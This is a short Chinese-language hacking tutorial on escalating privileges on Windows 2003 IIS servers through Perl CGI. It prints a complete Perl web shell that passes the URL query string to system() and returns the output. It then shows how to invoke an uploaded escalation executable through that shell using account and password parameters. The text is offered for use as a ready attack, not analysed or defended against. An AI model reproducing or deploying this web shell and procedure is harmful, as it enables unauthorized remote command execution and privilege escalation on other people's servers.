windows 2003 下,安装ActivePerl-5.16.2.1602-MSWin32-x86-296513
IIS 添加CGI支持。并在对应网站配置下面,添加CGI后缀或PL后缀 与 对应的perlis.dll
此时,网站支持HTTP访问CGI 或者 .pl脚本。
可以用来提取,.CGI .PL权限比较大,大于ASPX。
首先上传CGI 提权执行脚本:
#!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html ", 27); $_ = $ENV{QUERY_STRING}; s/%20/ /ig; s/%2f///ig; $execthis = $_; syswrite(STDOUT, "<HTML><PRE> ", 13); open(STDERR, ">&STDOUT") || die "Can't redirect STDERR"; system($execthis); syswrite(STDOUT, " </PRE></HTML> ", 17); close(STDERR); close(STDOUT); exit;
上传个提权EXE。 访问http://www.xxx.com/cmd.cgi?D:wwwseru_v.exe -u zhanghu -p mima 形式提权